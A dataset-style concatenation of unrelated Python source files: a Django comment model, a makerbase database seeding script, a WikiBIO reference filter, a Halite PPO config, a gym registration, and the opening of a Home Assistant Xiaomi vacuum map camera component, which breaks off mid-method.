choices=INTERNAL_EXTERNAL_CHOICES,
default=INTERNAL,)
objects = InternalExternalCommentManager()
class Meta(object):
verbose_name = 'Comment'
verbose_name_plural = 'Comments'
permissions = (
("can_post_internal", "Can post internal message"),
("can_delete_internal", "Can delete internal message"),
("can_edit_internal", "Can edit internal message"),
("can_view_internal", "Can view internal message"),
("can_delete_external", "Can delete external message"),
("can_edit_external", "Can edit external message"),
)
def __str__(self):
return "{}: {}".format(self.user or self.user_name, self.comment)
@property
def is_internal(self):
return self.internal_external == self.INTERNAL
@property
def data(self):
return {
"pk": self.pk,
"comment": self.comment,
"user": self.user.username if self.user else "",
"object_pk": self.object_pk,
"content_type_id": self.content_type_id,
"submit_date": str(self.submit_date),
}
def get_content_object_url(self):
"""
Get a URL suitable for redirecting to the content object.
"""
return reverse(
"comments-url-redirect",
args=(self.content_type_id, self.object_pk)
)
| 32.414286
| 75
| 0.619216
|
from django.db import models
from django_comments.abstracts import CommentAbstractModel
from django_comments.managers import CommentManager
from django.contrib.sites.models import Site
from django.urls import reverse
class InternalExternalCommentManager(CommentManager):
def for_site(self, site=None):
if site is None:
site = Site.objects.get_current()
return self.filter(site=site)
def valid(self):
return self.for_site().filter(is_removed=False, is_public=True)
class InternalExternalComment(CommentAbstractModel):
INTERNAL = 'internal'
EXTERNAL = 'external'
INTERNAL_EXTERNAL_CHOICES = (
(INTERNAL, 'Internal'),
(EXTERNAL, 'External'),
)
internal_external = models.CharField(max_length=8,
choices=INTERNAL_EXTERNAL_CHOICES,
default=INTERNAL,)
objects = InternalExternalCommentManager()
class Meta(object):
verbose_name = 'Comment'
verbose_name_plural = 'Comments'
permissions = (
("can_post_internal", "Can post internal message"),
("can_delete_internal", "Can delete internal message"),
("can_edit_internal", "Can edit internal message"),
("can_view_internal", "Can view internal message"),
("can_delete_external", "Can delete external message"),
("can_edit_external", "Can edit external message"),
)
def __str__(self):
return "{}: {}".format(self.user or self.user_name, self.comment)
@property
def is_internal(self):
return self.internal_external == self.INTERNAL
@property
def data(self):
return {
"pk": self.pk,
"comment": self.comment,
"user": self.user.username if self.user else "",
"object_pk": self.object_pk,
"content_type_id": self.content_type_id,
"submit_date": str(self.submit_date),
}
def get_content_object_url(self):
return reverse(
"comments-url-redirect",
args=(self.content_type_id, self.object_pk)
)
| true
| true
|
1c421dabaf6d795cc19ab256b3f39a700a58b938
| 5,702
|
py
|
Python
|
data.py
|
markpasc/makerbase
|
d35bc9da8fc843806465c2159b220cb8ca9234f6
|
[
"MIT"
] | 4
|
2015-02-12T19:18:11.000Z
|
2015-07-30T18:45:48.000Z
|
data.py
|
markpasc/makerbase
|
d35bc9da8fc843806465c2159b220cb8ca9234f6
|
[
"MIT"
] | null | null | null |
data.py
|
markpasc/makerbase
|
d35bc9da8fc843806465c2159b220cb8ca9234f6
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
import makerbase
from makerbase.models import *
"""
user: {
'id':
'name':
'avatar_url':
'html_url':
<link to person?>
}
maker: {
'name':
'avatar_url':
'html_url':
}
project: {
'name':
'description':
'avatar_url':
'html_url':
}
participation: {
<link to person>
<link to project>
'role': "140 char description"
'start_year': 2012
'start_month': 0
'end_year': 2012
'end_year': 1
}
history: {
<link to user>
'action': '[create edit]'
'reason': "140 char description"
'when': <iso8601 timestamp>
'new': { obj data? }
}
"""
def blit(cls, ident):
obj = cls.get(ident)
if obj is not None:
obj.delete()
def empty_bucket(cls):
keys = cls.get_bucket().get_keys()
for key in keys:
blit(cls, key)
for cls in (Project, Maker, Participation, History):
empty_bucket(cls)
def now():
somewhen = datetime(2012, 4, 11, 13, 0, 0)
while True:
yield somewhen.isoformat()
somewhen += timedelta(minutes=1)
now = now()
editor = User(
'github:markpasc',
name='Mark Paschal',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
html_url='https://github.com/markpasc',
)
editor.save()
mlkshk = Project(
'mlkshk',
name='MLKSHK',
description='A site for sharing pictures.',
html_url='http://mlkshk.com/',
avatar_url='https://mlkshk.com/r/2NOE',
)
mlkshk.save()
h = History(
action='addproject',
reason='new project',
when=now.next(),
old_data={},
new_data=mlkshk.get_entity_data(),
).add_link(editor, tag='user').add_link(mlkshk, tag='project')
h.save()
mlkshk.add_link(h, tag='history').save()
me = Maker(
'markpasc',
name='Mark Paschal',
html_url='http://markpasc.org/mark/',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?s=140&d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
)
me.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=me.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker')
h.save()
me.add_link(h, tag='history').save()
andre = Maker(
'torrez',
name='Andre Torrez',
html_url='http://torrez.org/',
avatar_url='https://si0.twimg.com/profile_images/1788942159/black-log.gif',
)
andre.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=andre.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker')
h.save()
andre.add_link(h, tag='history').save()
amber = Maker(
'amber',
name='Amber Costley',
html_url='http://ambercostley.com/',
avatar_url='https://si0.twimg.com/profile_images/1452719858/twit.jpg',
)
amber.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=amber.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker')
h.save()
amber.add_link(h, tag='history').save()
party = Participation(
role='Creator and programmer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(andre, tag='maker')
party.save()
andre.add_link(party, tag='participation')
andre.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with andre on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker').add_link(mlkshk, tag='project')
h.save()
andre.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Creator and designer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(amber, tag='maker')
party.save()
amber.add_link(party, tag='participation')
amber.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with amber on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker').add_link(mlkshk, tag='project')
h.save()
amber.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Contract API programmer & test writer',
start_month=4,
start_year=2011,
end_month=5,
end_year=2011,
)
party.save()
party.add_link(me, tag='maker')
party.add_link(mlkshk, tag='project')
party.save()
me.add_link(party, tag='participation')
me.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='i worked on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker').add_link(mlkshk, tag='project')
h.save()
me.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
anildash = Maker(
'anildash',
name='Anil Dash',
html_url='http://dashes.com/anil/about.html',
avatar_url='https://si0.twimg.com/profile_images/1364557668/image_reasonably_small.jpg',
)
anildash.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=anildash.get_entity_data(),
).add_link(editor, tag='user').add_link(anildash, tag='maker')
h.save()
anildash.add_link(h, tag='history').save()
| 21.598485
| 177
| 0.659418
|
from datetime import datetime, timedelta
import makerbase
from makerbase.models import *
def blit(cls, ident):
obj = cls.get(ident)
if obj is not None:
obj.delete()
def empty_bucket(cls):
keys = cls.get_bucket().get_keys()
for key in keys:
blit(cls, key)
for cls in (Project, Maker, Participation, History):
empty_bucket(cls)
def now():
somewhen = datetime(2012, 4, 11, 13, 0, 0)
while True:
yield somewhen.isoformat()
somewhen += timedelta(minutes=1)
now = now()
editor = User(
'github:markpasc',
name='Mark Paschal',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
html_url='https://github.com/markpasc',
)
editor.save()
mlkshk = Project(
'mlkshk',
name='MLKSHK',
description='A site for sharing pictures.',
html_url='http://mlkshk.com/',
avatar_url='https://mlkshk.com/r/2NOE',
)
mlkshk.save()
h = History(
action='addproject',
reason='new project',
when=now.next(),
old_data={},
new_data=mlkshk.get_entity_data(),
).add_link(editor, tag='user').add_link(mlkshk, tag='project')
h.save()
mlkshk.add_link(h, tag='history').save()
me = Maker(
'markpasc',
name='Mark Paschal',
html_url='http://markpasc.org/mark/',
avatar_url='https://secure.gravatar.com/avatar/30e5bdec1073df6350d27b8145bf0dab?s=140&d=https://a248.e.akamai.net/assets.github.com%2Fimages%2Fgravatars%2Fgravatar-140.png',
)
me.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=me.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker')
h.save()
me.add_link(h, tag='history').save()
andre = Maker(
'torrez',
name='Andre Torrez',
html_url='http://torrez.org/',
avatar_url='https://si0.twimg.com/profile_images/1788942159/black-log.gif',
)
andre.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=andre.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker')
h.save()
andre.add_link(h, tag='history').save()
amber = Maker(
'amber',
name='Amber Costley',
html_url='http://ambercostley.com/',
avatar_url='https://si0.twimg.com/profile_images/1452719858/twit.jpg',
)
amber.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=amber.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker')
h.save()
amber.add_link(h, tag='history').save()
party = Participation(
role='Creator and programmer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(andre, tag='maker')
party.save()
andre.add_link(party, tag='participation')
andre.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with andre on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(andre, tag='maker').add_link(mlkshk, tag='project')
h.save()
andre.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Creator and designer',
start_month=11,
start_year=2010,
)
party.save()
party.add_link(mlkshk, tag='project')
party.add_link(amber, tag='maker')
party.save()
amber.add_link(party, tag='participation')
amber.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='worked with amber on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(amber, tag='maker').add_link(mlkshk, tag='project')
h.save()
amber.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
party = Participation(
role='Contract API programmer & test writer',
start_month=4,
start_year=2011,
end_month=5,
end_year=2011,
)
party.save()
party.add_link(me, tag='maker')
party.add_link(mlkshk, tag='project')
party.save()
me.add_link(party, tag='participation')
me.save()
mlkshk.add_link(party, tag='participation')
mlkshk.save()
h = History(
action='addparty',
reason='i worked on that',
when=now.next(),
old_data={},
new_data=party.get_entity_data(),
).add_link(editor, tag='user').add_link(me, tag='maker').add_link(mlkshk, tag='project')
h.save()
me.add_link(h, tag='history').save()
mlkshk.add_link(h, tag='history').save()
anildash = Maker(
'anildash',
name='Anil Dash',
html_url='http://dashes.com/anil/about.html',
avatar_url='https://si0.twimg.com/profile_images/1364557668/image_reasonably_small.jpg',
)
anildash.save()
h = History(
action='addmaker',
reason='new maker',
when=now.next(),
old_data={},
new_data=anildash.get_entity_data(),
).add_link(editor, tag='user').add_link(anildash, tag='maker')
h.save()
anildash.add_link(h, tag='history').save()
| true
| true
|
1c421ddfb599c1e298cfa6ac646ba1826abb9a61
| 3,595
|
py
|
Python
|
data/filter_dataset.py
|
KaijuML/dtt-multi-branch
|
a49850a95034e58d387b9d48c647cfc2b83c45b5
|
[
"Apache-2.0"
] | 8
|
2021-02-25T08:19:55.000Z
|
2022-03-12T06:25:36.000Z
|
data/filter_dataset.py
|
KaijuML/dtt-multi-branch
|
a49850a95034e58d387b9d48c647cfc2b83c45b5
|
[
"Apache-2.0"
] | 5
|
2021-05-20T19:11:58.000Z
|
2021-07-14T07:46:33.000Z
|
data/filter_dataset.py
|
KaijuML/dtt-multi-branch
|
a49850a95034e58d387b9d48c647cfc2b83c45b5
|
[
"Apache-2.0"
] | null | null | null |
"""
This scripts filters the references from WikiBIO using our custom token score function
For now, only token with a score > 0 are kept.
"""
from utils import FileIterable, TaggedFileIterable
import multiprocessing as mp
import argparse
import tqdm
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_argument_group('How to config paths')
group.add_argument('--dest', dest='dest', required=True,
help='Where to store the filtered references')
group.add_argument('--scores', dest='scores', required=True,
help='Each line is (token, score) separated by \\t ' \
'Sentences are separated by an empty line')
group.add_argument('--refs', dest='refs', required=True,
help='Reference file. One sentence per line.')
group.add_argument('--threshold', dest='threshold', type=float, default=0,
help='Only keep tokens with a score <= threshold')
group = parser.add_argument_group('Arguments regarding multiprocessing')
group.add_argument('--n_jobs', dest='n_jobs', type=int, default=-1,
help='number of processes to use. <0 for cpu_count()')
group.add_argument('--chunksize', dest='chunksize', type=int, default=10,
help='chunksize to use in mp.Pool().imap()' \
'Change this if you know what you are doing.')
args = parser.parse_args()
if not 0 <= args.threshold <= 1:
raise ValueError('threshold should be between 0 and 1'
f'Got {args.threshold}')
if not args.chunksize > 0:
print('\nWARNING:',
'Expected chunksize to be a non-zero positive integer.',
f'Instead got {args.chunksize}.',
'Instead, chunksize=1 will be used')
args.chunksize = 1
if os.path.exists(args.dest):
print('\nWARNING:',
f'{args.dest} already exists, it will be overwritten.',
'Stop the process ASAP to avoid this\n')
else:
# we use this touch to verify dest is a valid path
# so that the script does not run if it's not the case
with open(args.dest, mode="w", encoding='utf8') as f:
pass
references = FileIterable.from_filename(args.refs)
scored_references = TaggedFileIterable.from_filename(args.scores,
func=lambda x, s: (x, float(s)))
zipped_inputs = [
item for item in tqdm.tqdm(
zip(references, scored_references),
desc='Reading files',
total=len(references)
)
]
def deal_with_one_instance(zipped_args):
ref, scored_ref = zipped_args
filtered_ref = list()
for token, (_, score) in zip(ref, scored_ref):
if score <= args.threshold:
filtered_ref.append(token)
return ' '.join(filtered_ref)
n_jobs = mp.cpu_count() if args.n_jobs < 0 else args.n_jobs
print(f'Using {n_jobs} processes, starting now')
with open(args.dest, mode="w", encoding='utf8') as f, mp.Pool(processes=n_jobs) as pool:
_iterable = pool.imap(
deal_with_one_instance,
zipped_inputs,
chunksize=args.chunksize
)
for filtered_reference in tqdm.tqdm(
_iterable, total=len(references), desc='Filtering references'):
f.write(f'{filtered_reference}\n')
| 39.505495
| 92
| 0.588595
|
from utils import FileIterable, TaggedFileIterable
import multiprocessing as mp
import argparse
import tqdm
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_argument_group('How to config paths')
group.add_argument('--dest', dest='dest', required=True,
help='Where to store the filtered references')
group.add_argument('--scores', dest='scores', required=True,
help='Each line is (token, score) separated by \\t ' \
'Sentences are separated by an empty line')
group.add_argument('--refs', dest='refs', required=True,
help='Reference file. One sentence per line.')
group.add_argument('--threshold', dest='threshold', type=float, default=0,
help='Only keep tokens with a score <= threshold')
group = parser.add_argument_group('Arguments regarding multiprocessing')
group.add_argument('--n_jobs', dest='n_jobs', type=int, default=-1,
help='number of processes to use. <0 for cpu_count()')
group.add_argument('--chunksize', dest='chunksize', type=int, default=10,
help='chunksize to use in mp.Pool().imap()' \
'Change this if you know what you are doing.')
args = parser.parse_args()
if not 0 <= args.threshold <= 1:
raise ValueError('threshold should be between 0 and 1'
f'Got {args.threshold}')
if not args.chunksize > 0:
print('\nWARNING:',
'Expected chunksize to be a non-zero positive integer.',
f'Instead got {args.chunksize}.',
'Instead, chunksize=1 will be used')
args.chunksize = 1
if os.path.exists(args.dest):
print('\nWARNING:',
f'{args.dest} already exists, it will be overwritten.',
'Stop the process ASAP to avoid this\n')
else:
with open(args.dest, mode="w", encoding='utf8') as f:
pass
references = FileIterable.from_filename(args.refs)
scored_references = TaggedFileIterable.from_filename(args.scores,
func=lambda x, s: (x, float(s)))
zipped_inputs = [
item for item in tqdm.tqdm(
zip(references, scored_references),
desc='Reading files',
total=len(references)
)
]
def deal_with_one_instance(zipped_args):
ref, scored_ref = zipped_args
filtered_ref = list()
for token, (_, score) in zip(ref, scored_ref):
if score <= args.threshold:
filtered_ref.append(token)
return ' '.join(filtered_ref)
n_jobs = mp.cpu_count() if args.n_jobs < 0 else args.n_jobs
print(f'Using {n_jobs} processes, starting now')
with open(args.dest, mode="w", encoding='utf8') as f, mp.Pool(processes=n_jobs) as pool:
_iterable = pool.imap(
deal_with_one_instance,
zipped_inputs,
chunksize=args.chunksize
)
for filtered_reference in tqdm.tqdm(
_iterable, total=len(references), desc='Filtering references'):
f.write(f'{filtered_reference}\n')
| true
| true
|
1c421de3392afbd8279bdc95c2597c5b7c2a09fc
| 1,381
|
py
|
Python
|
examples/Baselines/Halite_competition/torch/config.py
|
lp2333/PARL
|
e4bde1f5b7e69c5f8d3ee3a90a647dfe12204bd3
|
[
"ECL-2.0",
"Apache-2.0"
] | 3,172
|
2018-05-22T02:02:29.000Z
|
2022-03-31T09:14:56.000Z
|
examples/Baselines/Halite_competition/torch/config.py
|
BKBK00/PARL
|
f508bc6085420431b504441c7ff129e64826603e
|
[
"Apache-2.0"
] | 422
|
2018-05-17T16:58:45.000Z
|
2022-03-31T02:03:25.000Z
|
examples/Baselines/Halite_competition/torch/config.py
|
BKBK00/PARL
|
f508bc6085420431b504441c7ff129e64826603e
|
[
"Apache-2.0"
] | 794
|
2018-05-21T18:33:19.000Z
|
2022-03-30T13:38:09.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
config = {
# configuration for env
"board_size": 21,
# configuration for training
"episodes": 10000,
"batch_size": 128,
"train_times": 2,
"gamma": 0.997,
"lr": 0.0001,
"test_every_episode": 100,
# configuration for ppo algorithm
"vf_loss_coef": 1,
"ent_coef": 0.01,
# configuration for the observation of ships
"world_dim": 5 * 21 * 21,
"ship_obs_dim": 6,
"ship_act_dim": 5,
"ship_max_step": 10000,
# the number of halite we want the ships to obtain (e.g K)
"num_halite": 100,
# the maximum number of ships (e.g M)
"num_ships": 10,
# seed for training
"seed": 123456,
# configuration for logging
"log_path": './train_log/',
"save_path": './save_model/',
}
| 27.078431
| 74
| 0.669804
|
config = {
"board_size": 21,
"episodes": 10000,
"batch_size": 128,
"train_times": 2,
"gamma": 0.997,
"lr": 0.0001,
"test_every_episode": 100,
"vf_loss_coef": 1,
"ent_coef": 0.01,
"world_dim": 5 * 21 * 21,
"ship_obs_dim": 6,
"ship_act_dim": 5,
"ship_max_step": 10000,
"num_halite": 100,
"num_ships": 10,
"seed": 123456,
"log_path": './train_log/',
"save_path": './save_model/',
}
| true
| true
|
1c421e40cbc61c50529786cd59cc92e00d2cf13d
| 143
|
py
|
Python
|
gym-battleship-basic/gym_battleship_basic/__init__.py
|
xwx1989119/Battleship
|
518f0211d898c0ed20bf2a14c1b1b5750b371f25
|
[
"MIT"
] | null | null | null |
gym-battleship-basic/gym_battleship_basic/__init__.py
|
xwx1989119/Battleship
|
518f0211d898c0ed20bf2a14c1b1b5750b371f25
|
[
"MIT"
] | null | null | null |
gym-battleship-basic/gym_battleship_basic/__init__.py
|
xwx1989119/Battleship
|
518f0211d898c0ed20bf2a14c1b1b5750b371f25
|
[
"MIT"
] | null | null | null |
from gym.envs.registration import register
register(
id='battleshipBasic-v0',
entry_point='gym_battleship_basic.envs:BattleshipEnv',
)
| 23.833333
| 58
| 0.783217
|
from gym.envs.registration import register
register(
id='battleshipBasic-v0',
entry_point='gym_battleship_basic.envs:BattleshipEnv',
)
| true
| true
|
1c421fb628459617e362cb622c3fe92548a7c650
| 17,918
|
py
|
Python
|
custom_components/xiaomi_cloud_map_extractor/camera.py
|
GuyKh/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor
|
65e0a905fdb6048facdb34cbec40b7ece4fef991
|
[
"MIT"
] | 697
|
2020-09-30T08:35:58.000Z
|
2022-03-31T17:14:20.000Z
|
custom_components/xiaomi_cloud_map_extractor/camera.py
|
GuyKh/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor
|
65e0a905fdb6048facdb34cbec40b7ece4fef991
|
[
"MIT"
] | 216
|
2020-10-01T12:05:24.000Z
|
2022-03-31T11:35:46.000Z
|
custom_components/xiaomi_cloud_map_extractor/camera.py
|
GuyKh/Home-Assistant-custom-components-Xiaomi-Cloud-Map-Extractor
|
65e0a905fdb6048facdb34cbec40b7ece4fef991
|
[
"MIT"
] | 92
|
2020-09-30T18:10:19.000Z
|
2022-03-24T12:15:18.000Z
|
import io
import logging
import time
from datetime import timedelta
from enum import Enum
import miio
import PIL.Image as Image
import voluptuous as vol
from homeassistant.components.camera import Camera, ENTITY_ID_FORMAT, PLATFORM_SCHEMA, SUPPORT_ON_OFF
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import generate_entity_id
from homeassistant.helpers.reload import async_setup_reload_service
from custom_components.xiaomi_cloud_map_extractor.common.map_data_parser import MapDataParser
from custom_components.xiaomi_cloud_map_extractor.common.xiaomi_cloud_connector import XiaomiCloudConnector
from custom_components.xiaomi_cloud_map_extractor.const import *
from custom_components.xiaomi_cloud_map_extractor.dreame.vacuum import DreameVacuum
from custom_components.xiaomi_cloud_map_extractor.roidmi.vacuum import RoidmiVacuum
from custom_components.xiaomi_cloud_map_extractor.viomi.vacuum import ViomiVacuum
from custom_components.xiaomi_cloud_map_extractor.xiaomi.vacuum import XiaomiVacuum
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(seconds=5)
DEFAULT_TRIMS = {
CONF_LEFT: 0,
CONF_RIGHT: 0,
CONF_TOP: 0,
CONF_BOTTOM: 0
}
DEFAULT_SIZES = {
CONF_SIZE_VACUUM_RADIUS: 4,
CONF_SIZE_IGNORED_OBSTACLE_RADIUS: 3,
CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_OBSTACLE_RADIUS: 3,
CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS: 3,
CONF_SIZE_CHARGER_RADIUS: 4
}
COLOR_SCHEMA = vol.Or(
vol.All(vol.Length(min=3, max=3), vol.ExactSequence((cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple)),
vol.All(vol.Length(min=4, max=4), vol.ExactSequence((cv.byte, cv.byte, cv.byte, cv.byte)), vol.Coerce(tuple))
)
PERCENT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0, max=100))
POSITIVE_FLOAT_SCHEMA = vol.All(vol.Coerce(float), vol.Range(min=0))
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_TOKEN): vol.All(str, vol.Length(min=32, max=32)),
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_COUNTRY, default=None): vol.Or(vol.In(CONF_AVAILABLE_COUNTRIES), vol.Equal(None)),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_AUTO_UPDATE, default=True): cv.boolean,
vol.Optional(CONF_COLORS, default={}): vol.Schema({
vol.In(CONF_AVAILABLE_COLORS): COLOR_SCHEMA
}),
vol.Optional(CONF_ROOM_COLORS, default={}): vol.Schema({
cv.positive_int: COLOR_SCHEMA
}),
vol.Optional(CONF_DRAW, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_DRAWABLES)]),
vol.Optional(CONF_MAP_TRANSFORM, default={CONF_SCALE: 1, CONF_ROTATE: 0, CONF_TRIM: DEFAULT_TRIMS}):
vol.Schema({
vol.Optional(CONF_SCALE, default=1): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_ROTATE, default=0): vol.In([0, 90, 180, 270]),
vol.Optional(CONF_TRIM, default=DEFAULT_TRIMS): vol.Schema({
vol.Optional(CONF_LEFT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_RIGHT, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_TOP, default=0): PERCENT_SCHEMA,
vol.Optional(CONF_BOTTOM, default=0): PERCENT_SCHEMA
}),
}),
vol.Optional(CONF_ATTRIBUTES, default=[]): vol.All(cv.ensure_list, [vol.In(CONF_AVAILABLE_ATTRIBUTES)]),
vol.Optional(CONF_TEXTS, default=[]):
vol.All(cv.ensure_list, [vol.Schema({
vol.Required(CONF_TEXT): cv.string,
vol.Required(CONF_X): vol.Coerce(float),
vol.Required(CONF_Y): vol.Coerce(float),
vol.Optional(CONF_COLOR, default=(0, 0, 0)): COLOR_SCHEMA,
vol.Optional(CONF_FONT, default=None): vol.Or(cv.string, vol.Equal(None)),
vol.Optional(CONF_FONT_SIZE, default=0): cv.positive_int
})]),
vol.Optional(CONF_SIZES, default=DEFAULT_SIZES): vol.Schema({
vol.Optional(CONF_SIZE_VACUUM_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_VACUUM_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_IGNORED_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_OBSTACLE_WITH_PHOTO_RADIUS]): POSITIVE_FLOAT_SCHEMA,
vol.Optional(CONF_SIZE_CHARGER_RADIUS,
default=DEFAULT_SIZES[CONF_SIZE_CHARGER_RADIUS]): POSITIVE_FLOAT_SCHEMA
}),
vol.Optional(CONF_STORE_MAP_RAW, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_IMAGE, default=False): cv.boolean,
vol.Optional(CONF_STORE_MAP_PATH, default="/tmp"): cv.string,
vol.Optional(CONF_FORCE_API, default=None): vol.Or(vol.In(CONF_AVAILABLE_APIS), vol.Equal(None))
})
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
host = config[CONF_HOST]
token = config[CONF_TOKEN]
username = config[CONF_USERNAME]
password = config[CONF_PASSWORD]
country = config[CONF_COUNTRY]
name = config[CONF_NAME]
should_poll = config[CONF_AUTO_UPDATE]
image_config = config[CONF_MAP_TRANSFORM]
colors = config[CONF_COLORS]
room_colors = config[CONF_ROOM_COLORS]
for room, color in room_colors.items():
colors[f"{COLOR_ROOM_PREFIX}{room}"] = color
drawables = config[CONF_DRAW]
sizes = config[CONF_SIZES]
texts = config[CONF_TEXTS]
if DRAWABLE_ALL in drawables:
drawables = CONF_AVAILABLE_DRAWABLES[1:]
attributes = config[CONF_ATTRIBUTES]
store_map_raw = config[CONF_STORE_MAP_RAW]
store_map_image = config[CONF_STORE_MAP_IMAGE]
store_map_path = config[CONF_STORE_MAP_PATH]
force_api = config[CONF_FORCE_API]
entity_id = generate_entity_id(ENTITY_ID_FORMAT, name, hass=hass)
async_add_entities([VacuumCamera(entity_id, host, token, username, password, country, name, should_poll,
image_config, colors, drawables, sizes, texts, attributes, store_map_raw,
store_map_image, store_map_path, force_api)])
class VacuumCamera(Camera):
def __init__(self, entity_id, host, token, username, password, country, name, should_poll, image_config, colors,
drawables, sizes, texts, attributes, store_map_raw, store_map_image, store_map_path, force_api):
super().__init__()
self.entity_id = entity_id
self.content_type = CONTENT_TYPE
self._vacuum = miio.Vacuum(host, token)
self._connector = XiaomiCloudConnector(username, password)
self._status = CameraStatus.INITIALIZING
self._device = None
self._name = name
self._should_poll = should_poll
self._image_config = image_config
self._colors = colors
self._drawables = drawables
self._sizes = sizes
self._texts = texts
self._attributes = attributes
self._store_map_raw = store_map_raw
self._store_map_image = store_map_image
self._store_map_path = store_map_path
self._forced_api = force_api
self._used_api = None
self._map_saved = None
self._image = None
self._map_data = None
self._logged_in = False
self._logged_in_previously = True
self._received_map_name_previously = True
self._country = country
async def async_added_to_hass(self) -> None:
self.async_schedule_update_ha_state(True)
@property
def frame_interval(self):
return 1
def camera_image(self):
return self._image
@property
def name(self):
return self._name
def turn_on(self):
self._should_poll = True
def turn_off(self):
self._should_poll = False
@property
def supported_features(self):
return SUPPORT_ON_OFF
@property
def device_state_attributes(self):
attributes = {}
if self._map_data is not None:
